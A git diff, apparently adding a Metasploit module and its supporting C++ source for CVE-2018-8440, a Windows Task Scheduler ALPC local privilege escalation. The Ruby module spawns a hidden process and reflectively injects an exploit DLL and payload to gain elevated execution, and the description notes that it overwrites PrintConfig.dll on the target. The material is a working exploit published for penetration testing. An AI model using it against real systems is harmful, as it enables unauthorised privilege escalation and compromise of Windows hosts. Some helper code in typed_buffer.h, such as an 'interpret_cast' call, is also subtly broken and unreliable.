+/* 1098 */	NdrFcShort( 0x2150 ),	/* Flags:  out, base type, simple ref, srv alloc size=8 */
+/* 1100 */	NdrFcShort( 0x20 ),	/* X64 Stack size/offset = 32 */
+/* 1102 */	0x8,		/* FC_LONG */
+			0x0,		/* 0 */
+
+	/* Parameter arg_4 */
+
+/* 1104 */	NdrFcShort( 0x70 ),	/* Flags:  out, return, base type, */
+/* 1106 */	NdrFcShort( 0x28 ),	/* X64 Stack size/offset = 40 */
+/* 1108 */	0x8,		/* FC_LONG */
+			0x0,		/* 0 */
+
+	/* Procedure _SchRpcGetNumberOfMissedRuns */
+
+
+	/* Return value */
+
+/* 1110 */	0x0,		/* 0 */
+			0x48,		/* Old Flags:  */
+/* 1112 */	NdrFcLong( 0x0 ),	/* 0 */
+/* 1116 */	NdrFcShort( 0x12 ),	/* 18 */
+/* 1118 */	NdrFcShort( 0x20 ),	/* X64 Stack size/offset = 32 */
+/* 1120 */	0x32,		/* FC_BIND_PRIMITIVE */
+			0x0,		/* 0 */
+/* 1122 */	NdrFcShort( 0x0 ),	/* X64 Stack size/offset = 0 */
+/* 1124 */	NdrFcShort( 0x0 ),	/* 0 */
+/* 1126 */	NdrFcShort( 0x24 ),	/* 36 */
+/* 1128 */	0x46,		/* Oi2 Flags:  clt must size, has return, has ext, */
+			0x3,		/* 3 */
+/* 1130 */	0xa,		/* 10 */
+			0x1,		/* Ext Flags:  new corr desc, */
+/* 1132 */	NdrFcShort( 0x0 ),	/* 0 */
+/* 1134 */	NdrFcShort( 0x0 ),	/* 0 */
+/* 1136 */	NdrFcShort( 0x0 ),	/* 0 */
+/* 1138 */	NdrFcShort( 0x0 ),	/* 0 */
+
+	/* Parameter IDL_handle */
+
+/* 1140 */	NdrFcShort( 0x10b ),	/* Flags:  must size, must free, in, simple ref, */
+/* 1142 */	NdrFcShort( 0x8 ),	/* X64 Stack size/offset = 8 */
+/* 1144 */	NdrFcShort( 0xc ),	/* Type Offset=12 */
+
+	/* Parameter arg_1 */
+
+/* 1146 */	NdrFcShort( 0x2150 ),	/* Flags:  out, base type, simple ref, srv alloc size=8 */
+/* 1148 */	NdrFcShort( 0x10 ),	/* X64 Stack size/offset = 16 */
+/* 1150 */	0x8,		/* FC_LONG */
+			0x0,		/* 0 */
+
+	/* Parameter arg_2 */
+
+/* 1152 */	NdrFcShort( 0x70 ),	/* Flags:  out, return, base type, */
+/* 1154 */	NdrFcShort( 0x18 ),	/* X64 Stack size/offset = 24 */
+/* 1156 */	0x8,		/* FC_LONG */
+			0x0,		/* 0 */
+
+	/* Procedure _SchRpcEnableTask */
+
+
+	/* Return value */
+
+/* 1158 */	0x0,		/* 0 */
+			0x48,		/* Old Flags:  */
+/* 1160 */	NdrFcLong( 0x0 ),	/* 0 */
+/* 1164 */	NdrFcShort( 0x13 ),	/* 19 */
+/* 1166 */	NdrFcShort( 0x20 ),	/* X64 Stack size/offset = 32 */
+/* 1168 */	0x32,		/* FC_BIND_PRIMITIVE */
+			0x0,		/* 0 */
+/* 1170 */	NdrFcShort( 0x0 ),	/* X64 Stack size/offset = 0 */
+/* 1172 */	NdrFcShort( 0x8 ),	/* 8 */
+/* 1174 */	NdrFcShort( 0x8 ),	/* 8 */
+/* 1176 */	0x46,		/* Oi2 Flags:  clt must size, has return, has ext, */
+			0x3,		/* 3 */
+/* 1178 */	0xa,		/* 10 */
+			0x1,		/* Ext Flags:  new corr desc, */
+/* 1180 */	NdrFcShort( 0x0 ),	/* 0 */
+/* 1182 */	NdrFcShort( 0x0 ),	/* 0 */
+/* 1184 */	NdrFcShort( 0x0 ),	/* 0 */
+/* 1186 */	NdrFcShort( 0x0 ),	/* 0 */
+
+	/* Parameter IDL_handle */
+
+/* 1188 */	NdrFcShort( 0x10b ),	/* Flags:  must size, must free, in, simple ref, */
+/* 1190 */	NdrFcShort( 0x8 ),	/* X64 Stack size/offset = 8 */
+/* 1192 */	NdrFcShort( 0xc ),	/* Type Offset=12 */
+
+	/* Parameter arg_1 */
+
+/* 1194 */	NdrFcShort( 0x48 ),	/* Flags:  in, base type, */
+/* 1196 */	NdrFcShort( 0x10 ),	/* X64 Stack size/offset = 16 */
+/* 1198 */	0x8,		/* FC_LONG */
+			0x0,		/* 0 */
+
+	/* Parameter arg_2 */
+
+/* 1200 */	NdrFcShort( 0x70 ),	/* Flags:  out, return, base type, */
+/* 1202 */	NdrFcShort( 0x18 ),	/* X64 Stack size/offset = 24 */
+/* 1204 */	0x8,		/* FC_LONG */
+			0x0,		/* 0 */
+
+			0x0
+        }
+    };
+
+static const rpc_MIDL_TYPE_FORMAT_STRING rpc__MIDL_TypeFormatString =
+    {
+        0,
+        {
+			NdrFcShort( 0x0 ),	/* 0 */
+/*  2 */	
+			0x11, 0xc,	/* FC_RP [alloced_on_stack] [simple_pointer] */
+/*  4 */	0x8,		/* FC_LONG */
+			0x5c,		/* FC_PAD */
+/*  6 */	
+			0x12, 0x8,	/* FC_UP [simple_pointer] */
+/*  8 */	
+			0x25,		/* FC_C_WSTRING */
+			0x5c,		/* FC_PAD */
+/* 10 */	
+			0x11, 0x8,	/* FC_RP [simple_pointer] */
+/* 12 */	
+			0x25,		/* FC_C_WSTRING */
+			0x5c,		/* FC_PAD */
+/* 14 */	
+			0x12, 0x0,	/* FC_UP */
+/* 16 */	NdrFcShort( 0x18 ),	/* Offset= 24 (40) */
+/* 18 */	
+			0x1a,		/* FC_BOGUS_STRUCT */
+			0x3,		/* 3 */
+/* 20 */	NdrFcShort( 0x18 ),	/* 24 */
+/* 22 */	NdrFcShort( 0x0 ),	/* 0 */
+/* 24 */	NdrFcShort( 0x8 ),	/* Offset= 8 (32) */
+/* 26 */	0x36,		/* FC_POINTER */
+			0x36,		/* FC_POINTER */
+/* 28 */	0x8,		/* FC_LONG */
+			0x40,		/* FC_STRUCTPAD4 */
+/* 30 */	0x5c,		/* FC_PAD */
+			0x5b,		/* FC_END */
+/* 32 */	
+			0x12, 0x8,	/* FC_UP [simple_pointer] */
+/* 34 */	
+			0x25,		/* FC_C_WSTRING */
+			0x5c,		/* FC_PAD */
+/* 36 */	
+			0x12, 0x8,	/* FC_UP [simple_pointer] */
+/* 38 */	
+			0x25,		/* FC_C_WSTRING */
+			0x5c,		/* FC_PAD */
+/* 40 */	
+			0x21,		/* FC_BOGUS_ARRAY */
+			0x3,		/* 3 */
+/* 42 */	NdrFcShort( 0x0 ),	/* 0 */
+/* 44 */	0x28,		/* Corr desc:  parameter, FC_LONG */
+			0x0,		/*  */
+/* 46 */	NdrFcShort( 0x30 ),	/* X64 Stack size/offset = 48 */
+/* 48 */	NdrFcShort( 0x1 ),	/* Corr flags:  early, */
+/* 50 */	NdrFcLong( 0xffffffff ),	/* -1 */
+/* 54 */	NdrFcShort( 0x0 ),	/* Corr flags:  */
+/* 56 */	0x4c,		/* FC_EMBEDDED_COMPLEX */
+			0x0,		/* 0 */
+/* 58 */	NdrFcShort( 0xffd8 ),	/* Offset= -40 (18) */
+/* 60 */	0x5c,		/* FC_PAD */
+			0x5b,		/* FC_END */
+/* 62 */	
+			0x11, 0x14,	/* FC_RP [alloced_on_stack] [pointer_deref] */
+/* 64 */	NdrFcShort( 0xffc6 ),	/* Offset= -58 (6) */
+/* 66 */	
+			0x11, 0x14,	/* FC_RP [alloced_on_stack] [pointer_deref] */
+/* 68 */	NdrFcShort( 0x2 ),	/* Offset= 2 (70) */
+/* 70 */	
+			0x12, 0x0,	/* FC_UP */
+/* 72 */	NdrFcShort( 0x2 ),	/* Offset= 2 (74) */
+/* 74 */	
+			0x1a,		/* FC_BOGUS_STRUCT */
+			0x3,		/* 3 */
+/* 76 */	NdrFcShort( 0x18 ),	/* 24 */
+/* 78 */	NdrFcShort( 0x0 ),	/* 0 */
+/* 80 */	NdrFcShort( 0x8 ),	/* Offset= 8 (88) */
+/* 82 */	0x8,		/* FC_LONG */
+			0x8,		/* FC_LONG */
+/* 84 */	0x36,		/* FC_POINTER */
+			0x36,		/* FC_POINTER */
+/* 86 */	0x5c,		/* FC_PAD */
+			0x5b,		/* FC_END */
+/* 88 */	
+			0x12, 0x8,	/* FC_UP [simple_pointer] */
+/* 90 */	
+			0x25,		/* FC_C_WSTRING */
+			0x5c,		/* FC_PAD */
+/* 92 */	
+			0x12, 0x8,	/* FC_UP [simple_pointer] */
+/* 94 */	
+			0x25,		/* FC_C_WSTRING */
+			0x5c,		/* FC_PAD */
+/* 96 */	
+			0x11, 0x8,	/* FC_RP [simple_pointer] */
+/* 98 */	0x8,		/* FC_LONG */
+			0x5c,		/* FC_PAD */
+/* 100 */	
+			0x11, 0x14,	/* FC_RP [alloced_on_stack] [pointer_deref] */
+/* 102 */	NdrFcShort( 0x2 ),	/* Offset= 2 (104) */
+/* 104 */	
+			0x12, 0x0,	/* FC_UP */
+/* 106 */	NdrFcShort( 0x2 ),	/* Offset= 2 (108) */
+/* 108 */	
+			0x21,		/* FC_BOGUS_ARRAY */
+			0x3,		/* 3 */
+/* 110 */	NdrFcShort( 0x0 ),	/* 0 */
+/* 112 */	0x28,		/* Corr desc:  parameter, FC_LONG */
+			0x54,		/* FC_DEREFERENCE */
+/* 114 */	NdrFcShort( 0x28 ),	/* X64 Stack size/offset = 40 */
+/* 116 */	NdrFcShort( 0x1 ),	/* Corr flags:  early, */
+/* 118 */	NdrFcLong( 0xffffffff ),	/* -1 */
+/* 122 */	NdrFcShort( 0x0 ),	/* Corr flags:  */
+/* 124 */	
+			0x12, 0x8,	/* FC_UP [simple_pointer] */
+/* 126 */	
+			0x25,		/* FC_C_WSTRING */
+			0x5c,		/* FC_PAD */
+/* 128 */	0x5c,		/* FC_PAD */
+			0x5b,		/* FC_END */
+/* 130 */	
+			0x11, 0x14,	/* FC_RP [alloced_on_stack] [pointer_deref] */
+/* 132 */	NdrFcShort( 0x2 ),	/* Offset= 2 (134) */
+/* 134 */	
+			0x12, 0x0,	/* FC_UP */
+/* 136 */	NdrFcShort( 0x14 ),	/* Offset= 20 (156) */
+/* 138 */	
+			0x1d,		/* FC_SMFARRAY */
+			0x0,		/* 0 */
+/* 140 */	NdrFcShort( 0x8 ),	/* 8 */
+/* 142 */	0x1,		/* FC_BYTE */
+			0x5b,		/* FC_END */
+/* 144 */	
+			0x15,		/* FC_STRUCT */
+			0x3,		/* 3 */
+/* 146 */	NdrFcShort( 0x10 ),	/* 16 */
+/* 148 */	0x8,		/* FC_LONG */
+			0x6,		/* FC_SHORT */
+/* 150 */	0x6,		/* FC_SHORT */
+			0x4c,		/* FC_EMBEDDED_COMPLEX */
+/* 152 */	0x0,		/* 0 */
+			NdrFcShort( 0xfff1 ),	/* Offset= -15 (138) */
+			0x5b,		/* FC_END */
+/* 156 */	
+			0x21,		/* FC_BOGUS_ARRAY */
+			0x3,		/* 3 */
+/* 158 */	NdrFcShort( 0x0 ),	/* 0 */
+/* 160 */	0x28,		/* Corr desc:  parameter, FC_LONG */
+			0x54,		/* FC_DEREFERENCE */
+/* 162 */	NdrFcShort( 0x18 ),	/* X64 Stack size/offset = 24 */
+/* 164 */	NdrFcShort( 0x1 ),	/* Corr flags:  early, */
+/* 166 */	NdrFcLong( 0xffffffff ),	/* -1 */
+/* 170 */	NdrFcShort( 0x0 ),	/* Corr flags:  */
+/* 172 */	0x4c,		/* FC_EMBEDDED_COMPLEX */
+			0x0,		/* 0 */
+/* 174 */	NdrFcShort( 0xffe2 ),	/* Offset= -30 (144) */
+/* 176 */	0x5c,		/* FC_PAD */
+			0x5b,		/* FC_END */
+/* 178 */	
+			0x11, 0x0,	/* FC_RP */
+/* 180 */	NdrFcShort( 0xffdc ),	/* Offset= -36 (144) */
+/* 182 */	
+			0x11, 0x14,	/* FC_RP [alloced_on_stack] [pointer_deref] */
+/* 184 */	NdrFcShort( 0x2 ),	/* Offset= 2 (186) */
+/* 186 */	
+			0x12, 0x0,	/* FC_UP */
+/* 188 */	NdrFcShort( 0x2 ),	/* Offset= 2 (190) */
+/* 190 */	
+			0x21,		/* FC_BOGUS_ARRAY */
+			0x3,		/* 3 */
+/* 192 */	NdrFcShort( 0x0 ),	/* 0 */
+/* 194 */	0x28,		/* Corr desc:  parameter, FC_LONG */
+			0x54,		/* FC_DEREFERENCE */
+/* 196 */	NdrFcShort( 0x30 ),	/* X64 Stack size/offset = 48 */
+/* 198 */	NdrFcShort( 0x1 ),	/* Corr flags:  early, */
+/* 200 */	NdrFcLong( 0xffffffff ),	/* -1 */
+/* 204 */	NdrFcShort( 0x0 ),	/* Corr flags:  */
+/* 206 */	0x4c,		/* FC_EMBEDDED_COMPLEX */
+			0x0,		/* 0 */
+/* 208 */	NdrFcShort( 0xffc0 ),	/* Offset= -64 (144) */
+/* 210 */	0x5c,		/* FC_PAD */
+			0x5b,		/* FC_END */
+/* 212 */	
+			0x12, 0x0,	/* FC_UP */
+/* 214 */	NdrFcShort( 0x2 ),	/* Offset= 2 (216) */
+/* 216 */	
+			0x21,		/* FC_BOGUS_ARRAY */
+			0x3,		/* 3 */
+/* 218 */	NdrFcShort( 0x0 ),	/* 0 */
+/* 220 */	0x28,		/* Corr desc:  parameter, FC_LONG */
+			0x0,		/*  */
+/* 222 */	NdrFcShort( 0x10 ),	/* X64 Stack size/offset = 16 */
+/* 224 */	NdrFcShort( 0x1 ),	/* Corr flags:  early, */
+/* 226 */	NdrFcLong( 0xffffffff ),	/* -1 */
+/* 230 */	NdrFcShort( 0x0 ),	/* Corr flags:  */
+/* 232 */	
+			0x12, 0x8,	/* FC_UP [simple_pointer] */
+/* 234 */	
+			0x25,		/* FC_C_WSTRING */
+			0x5c,		/* FC_PAD */
+/* 236 */	0x5c,		/* FC_PAD */
+			0x5b,		/* FC_END */
+/* 238 */	
+			0x11, 0x4,	/* FC_RP [alloced_on_stack] */
+/* 240 */	NdrFcShort( 0xffa0 ),	/* Offset= -96 (144) */
+/* 242 */	
+			0x12, 0x0,	/* FC_UP */
+/* 244 */	NdrFcShort( 0x2 ),	/* Offset= 2 (246) */
+/* 246 */	
+			0x15,		/* FC_STRUCT */
+			0x1,		/* 1 */
+/* 248 */	NdrFcShort( 0x10 ),	/* 16 */
+/* 250 */	0x6,		/* FC_SHORT */
+			0x6,		/* FC_SHORT */
+/* 252 */	0x6,		/* FC_SHORT */
+			0x6,		/* FC_SHORT */
+/* 254 */	0x6,		/* FC_SHORT */
+			0x6,		/* FC_SHORT */
+/* 256 */	0x6,		/* FC_SHORT */
+			0x6,		/* FC_SHORT */
+/* 258 */	0x5c,		/* FC_PAD */
+			0x5b,		/* FC_END */
+/* 260 */	
+			0x11, 0x14,	/* FC_RP [alloced_on_stack] [pointer_deref] */
+/* 262 */	NdrFcShort( 0x2 ),	/* Offset= 2 (264) */
+/* 264 */	
+			0x12, 0x0,	/* FC_UP */
+/* 266 */	NdrFcShort( 0x2 ),	/* Offset= 2 (268) */
+/* 268 */	
+			0x21,		/* FC_BOGUS_ARRAY */
+			0x1,		/* 1 */
+/* 270 */	NdrFcShort( 0x0 ),	/* 0 */
+/* 272 */	0x28,		/* Corr desc:  parameter, FC_LONG */
+			0x54,		/* FC_DEREFERENCE */
+/* 274 */	NdrFcShort( 0x30 ),	/* X64 Stack size/offset = 48 */
+/* 276 */	NdrFcShort( 0x1 ),	/* Corr flags:  early, */
+/* 278 */	NdrFcLong( 0xffffffff ),	/* -1 */
+/* 282 */	NdrFcShort( 0x0 ),	/* Corr flags:  */
+/* 284 */	0x4c,		/* FC_EMBEDDED_COMPLEX */
+			0x0,		/* 0 */
+/* 286 */	NdrFcShort( 0xffd8 ),	/* Offset= -40 (246) */
+/* 288 */	0x5c,		/* FC_PAD */
+			0x5b,		/* FC_END */
+/* 290 */	
+			0x11, 0x4,	/* FC_RP [alloced_on_stack] */
+/* 292 */	NdrFcShort( 0xffd2 ),	/* Offset= -46 (246) */
+
+			0x0
+        }
+    };
+
+static const unsigned short DefaultIfName_FormatStringOffsetTable[] =
+    {
+    0,
+    42,
+    132,
+    192,
+    246,
+    300,
+    354,
+    426,
+    498,
+    558,
+    642,
+    690,
+    738,
+    816,
+    864,
+    918,
+    996,
+    1050,
+    1110,
+    1158
+    };
+
+
+static const MIDL_STUB_DESC DefaultIfName_StubDesc = 
+    {
+    (void *)& DefaultIfName___RpcServerInterface,
+    MIDL_user_allocate,
+    MIDL_user_free,
+    0,
+    0,
+    0,
+    0,
+    0,
+    rpc__MIDL_TypeFormatString.Format,
+    1, /* -error bounds_check flag */
+    0x50002, /* Ndr library version */
+    0,
+    0x800025b, /* MIDL Version 8.0.603 */
+    0,
+    0,
+    0,  /* notify & notify_flag routine table */
+    0x1, /* MIDL flag */
+    0, /* cs routines */
+    0,   /* proxy/server info */
+    0
+    };
+
+static const RPC_DISPATCH_FUNCTION DefaultIfName_table[] =
+    {
+    NdrServerCall2,
+    NdrServerCall2,
+    NdrServerCall2,
+    NdrServerCall2,
+    NdrServerCall2,
+    NdrServerCall2,
+    NdrServerCall2,
+    NdrServerCall2,
+    NdrServerCall2,
+    NdrServerCall2,
+    NdrServerCall2,
+    NdrServerCall2,
+    NdrServerCall2,
+    NdrServerCall2,
+    NdrServerCall2,
+    NdrServerCall2,
+    NdrServerCall2,
+    NdrServerCall2,
+    NdrServerCall2,
+    NdrServerCall2,
+    0
+    };
+static const RPC_DISPATCH_TABLE DefaultIfName_v1_0_DispatchTable = 
+    {
+    20,
+    (RPC_DISPATCH_FUNCTION*)DefaultIfName_table
+    };
+
+static const SERVER_ROUTINE DefaultIfName_ServerRoutineTable[] = 
+    {
+    (SERVER_ROUTINE)_SchRpcHighestVersion,
+    (SERVER_ROUTINE)_SchRpcRegisterTask,
+    (SERVER_ROUTINE)SchRpcRetrieveTask,
+    (SERVER_ROUTINE)_SchRpcCreateFolder,
+    (SERVER_ROUTINE)_SchRpcSetSecurity,
+    (SERVER_ROUTINE)_SchRpcGetSecurity,
+    (SERVER_ROUTINE)_SchRpcEnumFolders,
+    (SERVER_ROUTINE)_SchRpcEnumTasks,
+    (SERVER_ROUTINE)_SchRpcEnumInstances,
+    (SERVER_ROUTINE)_SchRpcGetInstanceInfo,
+    (SERVER_ROUTINE)_SchRpcStopInstance,
+    (SERVER_ROUTINE)_SchRpcStop,
+    (SERVER_ROUTINE)_SchRpcRun,
+    (SERVER_ROUTINE)_SchRpcDelete,
+    (SERVER_ROUTINE)_SchRpcRename,
+    (SERVER_ROUTINE)_SchRpcScheduledRuntimes,
+    (SERVER_ROUTINE)_SchRpcGetLastRunInfo,
+    (SERVER_ROUTINE)_SchRpcGetTaskInfo,
+    (SERVER_ROUTINE)_SchRpcGetNumberOfMissedRuns,
+    (SERVER_ROUTINE)_SchRpcEnableTask
+    };
+
+static const MIDL_SERVER_INFO DefaultIfName_ServerInfo = 
+    {
+    &DefaultIfName_StubDesc,
+    DefaultIfName_ServerRoutineTable,
+    rpc__MIDL_ProcFormatString.Format,
+    DefaultIfName_FormatStringOffsetTable,
+    0,
+    0,
+    0,
+    0};
+#if _MSC_VER >= 1200
+#pragma warning(pop)
+#endif
+
+
+#endif /* defined(_M_AMD64)*/
+
diff --git a/external/source/exploits/CVE-2018-8440/dll/ALPC-TaskSched-LPE/stdafx.cpp b/external/source/exploits/CVE-2018-8440/dll/ALPC-TaskSched-LPE/stdafx.cpp
new file mode 100755
index 0000000000..c659365943
--- /dev/null
+++ b/external/source/exploits/CVE-2018-8440/dll/ALPC-TaskSched-LPE/stdafx.cpp
@@ -0,0 +1,8 @@
+// stdafx.cpp : source file that includes just the standard includes
+// $safeprojectname$.pch will be the pre-compiled header
+// stdafx.obj will contain the pre-compiled type information
+
+#include "stdafx.h"
+
+// TODO: reference any additional headers you need in STDAFX.H
+// and not in this file
diff --git a/external/source/exploits/CVE-2018-8440/dll/ALPC-TaskSched-LPE/stdafx.h b/external/source/exploits/CVE-2018-8440/dll/ALPC-TaskSched-LPE/stdafx.h
new file mode 100755
index 0000000000..56b46d8844
--- /dev/null
+++ b/external/source/exploits/CVE-2018-8440/dll/ALPC-TaskSched-LPE/stdafx.h
@@ -0,0 +1,15 @@
+// stdafx.h : include file for standard system include files,
+// or project specific include files that are used frequently, but
+// are changed infrequently
+//
+
+#pragma once
+
+
+
+#define RPC_USE_NATIVE_WCHAR
+
+#include <stdio.h>
+#include <tchar.h>
+#include <Windows.h>
+#include <memory>
diff --git a/external/source/exploits/CVE-2018-8440/dll/ALPC-TaskSched-LPE/typed_buffer.h b/external/source/exploits/CVE-2018-8440/dll/ALPC-TaskSched-LPE/typed_buffer.h
new file mode 100755
index 0000000000..1ae447784f
--- /dev/null
+++ b/external/source/exploits/CVE-2018-8440/dll/ALPC-TaskSched-LPE/typed_buffer.h
@@ -0,0 +1,70 @@
+#pragma once
+
+#include <memory>
+#include <algorithm>
+
+template<class T>
+class typed_buffer_ptr {
+	std::unique_ptr<char[]> buffer_;
+	size_t size_;
+
+public:
+	typed_buffer_ptr() {
+	}
+
+	explicit typed_buffer_ptr(size_t size) {
+		reset(size);
+	}
+
+	void reset(size_t size) {
+		buffer_.reset(new char[size]);
+		memset(buffer_.get(), 0, size);
+		size_ = size;
+	}
+
+	void resize(size_t size) {
+		std::unique_ptr<char[]> tmp(new char[size]);
+
+		memcpy(tmp.get(), buffer_.get(), min(size, size_));
+
+		buffer_ = std::move(tmp);
+	}
+
+	operator T*() {
+		return reinterpret_cast<T*>(buffer_.get());
+	}
+
+	operator const T*() const {
+		return cget();
+	}
+
+	T* operator->() const {
+		return reinterpret_cast<T*>(buffer_.get());
+	}
+
+	const T* cget() const {
+		return interpret_cast<const T*>(buffer_.get());
+	}
+
+	typed_buffer_ptr(const typed_buffer_ptr<T>& other) = delete;
+	typed_buffer_ptr& typed_buffer_ptr::operator=(const typed_buffer_ptr<T>& other) = delete;
+
+	typed_buffer_ptr(typed_buffer_ptr<T>&& other) {
+		buffer_ = std::move(other.buffer_);
+		size_ = other.size_;
+		other.size_ = 0;
+	}
+
+	typed_buffer_ptr& operator=(typed_buffer_ptr<T>&& other) {
+		if (this != &other)
+		{
+			buffer_ = std::move(other.buffer_);
+			size_ = other.size_;
+			other.size_ = 0;
+		}
+	}
+
+	size_t size() const {
+		return size_;
+	}
+};
\ No newline at end of file
diff --git a/modules/exploits/windows/local/alpc_taskscheduler.rb b/modules/exploits/windows/local/alpc_taskscheduler.rb
new file mode 100644
index 0000000000..1df4352d66
--- /dev/null
+++ b/modules/exploits/windows/local/alpc_taskscheduler.rb
@@ -0,0 +1,142 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core/post/file'
+require 'msf/core/post/windows/priv'
+require 'msf/core/post/windows/registry'         #TODO: Do we need this?
+require 'msf/core/exploit/exe'
+
+class MetasploitModule < Msf::Exploit::Local
+  Rank = NormalRanking
+
+  include Msf::Post::File
+  include Msf::Exploit::EXE
+  include Msf::Post::Windows::Priv
+  include Msf::Post::Windows::ReflectiveDLLInjection
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'Microsoft Windows ALPC Task Scheduler Local Privilege Elevation',
+      'Description'    => %q(
+        On vulnerable versions of Windows the alpc endpoint method SchRpcSetSecurity implemented
+        by the task scheduler service can be used to write arbitrary DACLs to `.job` files located
+        in `c:\windows\tasks` because the scheduler does not use impersonation when checking this
+        location. Since users can create files in the `c:\windows\tasks` folder, a hardlink can be
+        created to a file the user has read access to. After creating a hardlink, the vulnerability
+        can be triggered to set the DACL on the linked file.
+
+        WARNING:
+        The PrintConfig.dll (%windir%\system32\driverstor\filerepository\prnms003*) on the target host
+        will be overwritten when the exploit runs.
+
+        This module has been tested against Windows 10 Pro x64.
+      ),
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+        [
+          'SandboxEscaper',       # Original discovery and PoC
+          'bwatters-r7',          # msf module
+          'asoto-r7',             # msf module
+          'Jacob Robles'          # msf module
+        ],
+      'Platform'       => 'win',
+      'SessionTypes'   => ['meterpreter'],
+      'Targets'        =>
+        [
+          ['Windows 10 x64', { 'Arch' => ARCH_X64 }]
+        ],
+      'References'     =>
+        [
+          ['CVE', '2018-8440'],
+          ['URL', 'https://github.com/SandboxEscaper/randomrepo/'],
+        ],
+      'DisclosureDate' => 'Aug 27 2018',
+      'DefaultTarget'  => 0,
+    ))
+
+    register_options([OptString.new('PROCESS',
+        [false, 'Name of process to spawn and inject dll into.', nil])
+    ])
+  end
+
+  def setup_process(process_name)
+    begin
+      print_status("Launching #{process_name} to host the exploit...")
+      launch_process = client.sys.process.execute(process_name, nil, 'Hidden' => true)
+      process = client.sys.process.open(launch_process.pid, PROCESS_ALL_ACCESS)
+      print_good("Process #{process.pid} launched.")
+    rescue Rex::Post::Meterpreter::RequestError
+      # Sandboxes could not allow to create a new process
+      # stdapi_sys_process_execute: Operation failed: Access is denied.
+      print_error('Operation failed. Trying to elevate the current process...')
+      process = client.sys.process.open
+    end
+    process
+  end
+
+  def inject_magic(process, payload_dll)
+    library_path = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2018-8440', 'ALPC-TaskSched-LPE.dll')
+    library_path = ::File.expand_path(library_path)
+    dll_data = ''
+    ::File.open(library_path, 'rb') { |f| dll_data = f.read }
+
+    print_status("Writing payload dll into process #{process.pid} memory")
+    payload_addr = process.memory.allocate(payload_dll.length, PROT_READ | PROT_WRITE)
+    written = process.memory.write(payload_addr, payload_dll)
+
+    if written != payload_dll.length
+      fail_with(Failure::UnexpectedReply, 'Failed to write payload to process memory')
+    end
+
+    print_status("Reflectively injecting the exploit DLL into #{process.pid}...")
+    exploit_mem, offset = inject_dll_data_into_process(process, dll_data)
+    process.thread.create(exploit_mem + offset, payload_addr)
+  end
+
+  def validate_active_host
+    sysinfo['Computer']
+    true
+  rescue Rex::Post::Meterpreter::RequestError, Rex::TimeoutError => e
+    elog("#{e.class} #{e.message}\n#{e.backtrace * "\n"}")
+    false
+  end
+
+  def validate_target
+    if is_system?
+      fail_with(Failure::None, 'Session is already elevated')
+    end
+
+    if sysinfo['Architecture'] == ARCH_X86
+      fail_with(Failure::NoTarget, 'Exploit code is 64-bit only')
+    end
+
+    if sysinfo['OS'] =~ /XP/
+      fail_with(Failure::Unknown, 'The exploit binary does not support Windows XP')
+    end
+  end
+
+  def exploit
+    unless session.type == 'meterpreter'
+      fail_with(Failure::None, 'Only meterpreter sessions are supported')
+    end
+
+    payload_dll = generate_payload_dll
+    process_name = datastore['PROCESS'] || 'notepad.exe'
+
+    print_status('Checking target...')
+    unless validate_active_host
+      raise Msf::Exploit::Failed, 'Could not connect to session'
+    end
+    validate_target
+
+    print_status("Target Looks Good... trying to start #{process_name}")
+    process = setup_process(process_name)
+    inject_magic(process, payload_dll)
+    print_good('Exploit finished, wait for (hopefully privileged) payload execution to complete.')
+  rescue Rex::Post::Meterpreter::RequestError => e
+    elog("#{e.class} #{e.message}\n#{e.backtrace * "\n"}")
+    print_error(e.message)
+  end
+end